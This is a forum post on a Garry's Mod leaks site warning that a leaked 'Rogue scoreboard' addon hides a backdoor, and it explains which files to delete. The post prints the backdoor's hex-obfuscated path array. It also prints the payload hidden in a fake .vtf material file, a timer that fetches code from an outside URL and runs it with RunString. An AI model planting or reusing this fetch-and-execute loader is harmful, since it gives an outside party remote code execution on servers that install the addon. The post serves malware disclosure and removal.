Garry's Mod Leaks

Rogue scoreboard

Submitted by Mentropase, , Thread ID: 226397

Thread Closed

RE: Rogue scoreboard

user100real
Member
Level:
23
Reputation:
5
Posts:
194
Likes:
16
Credits:
191
17-12-2021, 04:43 PM
#6
Another backdoor, has the same system as other addons that I have seen, first it contains a materials file, but it is actually a notepad with a code inside.
It works like this, inside the folder lua\autorun\server folder is the backdoor, inside the file is the following code:

Code:
local UNORDERED_LIST =
{
"\x6d","\x61","\x74",
"\x65","\x72","\x69",
"\x61","\x6c","\x73",
"\x2f","\x6e","\x70",
"\x63","\x2f","\x68",
"\x65","\x6c","\x70",
"\x2e","\x76","\x74",
"\x66"
}

which translated says:

Code:
materials/npc/help.vtf

inside the file is the following code:

Code:
timer.Simple(1, function() http.Fetch("https://kvac.cz/f.php?key=0I98ooO0W2ZGDy9FjZAP", function(b) RunString(b, ":", false) end)end)

To eliminate this backdoor, what they have to do is delete the following files:

Code:
rogue\lua\autorun\server\npc_help.lua
rogue\materials\npc\help.vtf

Users browsing this thread: 1 Guest(s)